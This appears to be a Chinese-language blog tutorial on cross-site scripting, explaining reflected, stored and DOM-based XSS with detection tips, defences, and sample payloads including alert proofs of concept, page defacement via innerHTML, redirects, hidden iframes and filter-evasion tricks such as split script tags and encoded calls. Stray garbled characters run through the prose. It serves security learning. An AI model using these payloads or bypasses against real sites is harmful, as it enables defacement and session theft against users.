1.XSS漏洞

xss: 全稱cross-site scripting寄啼,是用于攻擊Web客戶端而不是服務(wù)器端,其最大的特點(diǎn)是能把惡意的JS或HTML代碼注入到用戶瀏覽的網(wǎng)頁上代箭。而XSS漏洞的存在墩划,主要是由于Web應(yīng)用程序?qū)τ脩舻妮斎霙]有進(jìn)行嚴(yán)格的過濾所導(dǎo)致的,當(dāng)攻擊者把惡意代碼注入到網(wǎng)頁時(shí)嗡综,用戶只要訪問該網(wǎng)頁就會(huì)執(zhí)行其中的惡意代碼乙帮。
  1. 反射型xss(非持久): 反射型xss一般是指自定義內(nèi)容發(fā)送的服務(wù)器,服務(wù)器返回到客戶端顯示時(shí)產(chǎn)生的腳本執(zhí)行蛤高。常見在搜索功能中蚣旱。

    檢測方式: 輸入數(shù)據(jù)提交碑幅,看返回的內(nèi)容是不是還是原來的內(nèi)容戴陡,若是則很大可能存在漏洞塞绿。有時(shí)候返回的網(wǎng)頁信息可能沒有顯示原來輸入的內(nèi)容,但是可以通過查看網(wǎng)頁源代碼可以查看輸入的內(nèi)容有沒有注入到網(wǎng)頁的html代碼中恤批,若有則也明顯存在异吻。主要用于竊取客戶端cookie和釣魚欺騙。

<script>alert(/xss/)</script>
<a href=https://www.baidu.com>click</a>
<a href=’’ onclick=alert('xss')>type</a>
去相應(yīng)的網(wǎng)站訪問不到相應(yīng)的圖片文件時(shí)就報(bào)錯(cuò)彈窗:
<img src=http://10.10.10.137/alan.jpg onerror=alert('xss')> 

  1. 存儲(chǔ)型xss:(持久) 存儲(chǔ)型xss是指用戶輸入的xss腳本存儲(chǔ)到了數(shù)據(jù)庫中喜庞,例如留言板功能诀浪,每次查看留言時(shí)都會(huì)觸發(fā)。

    檢測方式: 在留言板內(nèi)容中輸入<script>alert(document.cookie)</script>彈出cookie信息


  1. DOM型xss: 其實(shí)是一種特殊類型的反射型XSS延都,它是基于DOM文檔對象模型的一種漏洞雷猪。客戶端的腳本程序可以通過DOM來動(dòng)態(tài)修改頁面內(nèi)容晰房,從客戶端獲取DOM中的數(shù)據(jù)并在本地執(zhí)行求摇。基于這個(gè)特性殊者,就可以利用JS腳本來實(shí)現(xiàn)XSS漏洞的利用与境。

    DOM: 全稱Document Object Model,是一個(gè)平臺和語言都中立的接口猖吴,可以使程序和腳本能夠動(dòng)態(tài)訪問和更新文檔的內(nèi)容摔刁、結(jié)構(gòu)以及樣式。

    檢測方式:構(gòu)造payload<script>alert(/xss/)</script> 觸發(fā)彈窗‘海蔽;alert(/xss/)//
    (注意) javascript中var 用于聲明變量共屈,為變量聲明文本值時(shí)加引號如var $a='xxx'; 所以要閉合前一個(gè)單引號,注釋后一個(gè)單引號才能觸發(fā)彈窗党窜。

    防御方法: DOM型XSS主要是由客戶端的腳本通過DOM動(dòng)態(tài)地輸出數(shù)據(jù)到頁面而不是依賴于將數(shù)據(jù)提交給服務(wù)器端趁俊,而從客戶端獲得DOM中的數(shù)據(jù)在本地執(zhí)行,因而僅從服務(wù)器端是無法防御的刑然。

  • 避免客戶端文檔重寫寺擂、重定向或其他敏感操作,同時(shí)避免使用客戶端數(shù)據(jù)泼掠,這些操作盡量在服務(wù)器端使用動(dòng)態(tài)頁面來實(shí)現(xiàn)怔软;
  • 分析和強(qiáng)化客戶端JS代碼,特別是受到用戶影響的DOM對象择镇,注意能直接修改DOM和創(chuàng)建HTML文件的相關(guān)函數(shù)或方法挡逼,并在輸出變量到頁面時(shí)先進(jìn)行編碼轉(zhuǎn)義,如輸出到HTML則進(jìn)行HTML編碼腻豌、輸出到<script>則進(jìn)行JS編碼家坎。

4. 利用XSS漏洞

  • 利用innerHTML:用于纂改頁面
    <script>document.body.innerHTML="<div style=visibility:visible;><h1>This is DOM XSS</h1></div>";</script>
  • 利用 重定向:
    <script>window.location='https://www.baidu.com'</script>
    <iframe SRC="http://www.sina.com" height="0" width="0"></iframe>

5. xss字符過濾

  • <script>標(biāo)簽的S大寫
  • 如果源碼匹配大小寫: <scr<script>ipt>alert("xss")</scr</script>ipt>
  • 如果源碼中發(fā)現(xiàn)傳到后臺的字符串中如果存在“script”(大小寫不分)嘱能,就會(huì)返回error:
    <img src=1 onerror=alert("xss")>
    name=<a herf="x" onclick="alert(/xss/)">test</a>
  • 傳到后臺的字符串中如果存在“alert”(大小寫不分),就會(huì)返回error:<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 65, 78, 89, 34, 41))</script>
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末虱疏,一起剝皮案震驚了整個(gè)濱河市惹骂,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌做瞪,老刑警劉巖对粪,帶你破解...
    沈念sama閱讀 206,126評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異装蓬,居然都是意外死亡著拭,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,254評論 2 382
  • 文/潘曉璐 我一進(jìn)店門牍帚,熙熙樓的掌柜王于貴愁眉苦臉地迎上來儡遮,“玉大人,你說我怎么就攤上這事暗赶”杀遥” “怎么了?”我有些...
    開封第一講書人閱讀 152,445評論 0 341
  • 文/不壞的土叔 我叫張陵忆首,是天一觀的道長爱榔。 經(jīng)常有香客問我,道長糙及,這世上最難降的妖魔是什么详幽? 我笑而不...
    開封第一講書人閱讀 55,185評論 1 278
  • 正文 為了忘掉前任,我火速辦了婚禮浸锨,結(jié)果婚禮上唇聘,老公的妹妹穿的比我還像新娘。我一直安慰自己柱搜,他們只是感情好迟郎,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,178評論 5 371
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著聪蘸,像睡著了一般宪肖。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上健爬,一...
    開封第一講書人閱讀 48,970評論 1 284
  • 那天控乾,我揣著相機(jī)與錄音,去河邊找鬼娜遵。 笑死蜕衡,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的设拟。 我是一名探鬼主播慨仿,決...
    沈念sama閱讀 38,276評論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼久脯,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了镰吆?” 一聲冷哼從身側(cè)響起帘撰,我...
    開封第一講書人閱讀 36,927評論 0 259
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎鼎姊,沒想到半個(gè)月后骡和,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體相赁,經(jīng)...
    沈念sama閱讀 43,400評論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡相寇,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,883評論 2 323
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了钮科。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片唤衫。...
    茶點(diǎn)故事閱讀 37,997評論 1 333
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖绵脯,靈堂內(nèi)的尸體忽然破棺而出佳励,到底是詐尸還是另有隱情,我是刑警寧澤蛆挫,帶...
    沈念sama閱讀 33,646評論 4 322
  • 正文 年R本政府宣布赃承,位于F島的核電站,受9級特大地震影響悴侵,放射性物質(zhì)發(fā)生泄漏瞧剖。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,213評論 3 307
  • 文/蒙蒙 一可免、第九天 我趴在偏房一處隱蔽的房頂上張望抓于。 院中可真熱鬧,春花似錦浇借、人聲如沸捉撮。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,204評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽巾遭。三九已至,卻和暖如春闯估,著一層夾襖步出監(jiān)牢的瞬間灼舍,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,423評論 1 260
  • 我被黑心中介騙來泰國打工睬愤, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留片仿,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 45,423評論 2 352
  • 正文 我出身青樓尤辱,卻偏偏與公主長得像砂豌,于是被迫代替她去往敵國和親厢岂。 傳聞我的和親對象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,722評論 2 345

推薦閱讀更多精彩內(nèi)容

  • xss 簡介 xss 跨站腳本攻擊(Cross Site Scripting),為了不和層疊樣式表(Cascadi...
    zksmile閱讀 27,234評論 7 36
  • 跨站腳本 (XSS) 是Web應(yīng)用中最常見的漏洞之一阳距,這篇文章塔粒,我們來討論識別Web應(yīng)用跨站腳本漏洞的關(guān)鍵點(diǎn)有哪些...
    半個(gè)王國閱讀 1,117評論 0 3
  • 寫在前面:本人剛?cè)肟有畔踩?鹫W洳纭儆谛“祝庠谕ㄟ^寫簡書的方式記錄并督促學(xué)習(xí)咖熟,希望各大神高抬貴手圃酵,若有紕漏請盡情...
    Weizhou_Wang94閱讀 524評論 0 1
  • 二十多年來郭赐,跨站腳本(簡稱 XSS)漏洞一直是主流網(wǎng)站的心頭之痛。為什么過了這么久确沸,這些網(wǎng)站還是對此類漏洞束手無策...
    OneAPM_Official閱讀 512評論 0 0
  • 常言道捌锭,男怕入錯(cuò)行,女怕嫁錯(cuò)郎罗捎。對于一個(gè)平凡的女子而言沒有什么比嫁對郎观谦,入對行更幸福了。兩個(gè)月來桨菜,足不出戶地感受了...
    老草閱讀 197評論 0 1